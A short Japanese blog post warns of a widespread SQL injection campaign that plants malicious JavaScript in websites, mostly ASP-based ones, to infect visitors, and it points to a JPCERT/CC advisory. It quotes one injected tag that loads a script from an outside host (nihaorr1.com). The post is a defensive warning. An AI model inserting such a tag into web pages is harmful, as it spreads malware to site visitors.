y2blog

SQLインジェクションによるWEBページの改竄が国内でも多数見つかっているようです

先週ぐらいからまた大規模なSQLインジェクションによって、WEBサイトに不正な Javascript を埋め込み、アクセスしてきたユーザのマシンを感染させる攻撃が蔓延しているようです．

埋め込まれる Javascript の一例として、 “<script src=http://www.nihaorr1.com/1.js>” があるようです．Google で検索を掛けただけでも５０数万件がヒットしました．日本語のサイトも結構検索に引っ掛かりますので注意していないと危ないですね．

某国内大手ミュージックレーベルなどのアーティストのページなども検索に引っ掛かりました．この不正 Javascript が仕掛けられているページは、ASP によるものが殆どのようですが、そのうち WordPress などのブログサイトも攻撃対象になるかもしれません．Wordpress もこまめにアップデートするようにしましょう．
JPCERT/CC の情報 『SQL インジェクションによる Web サイト改ざんに関する注意喚起』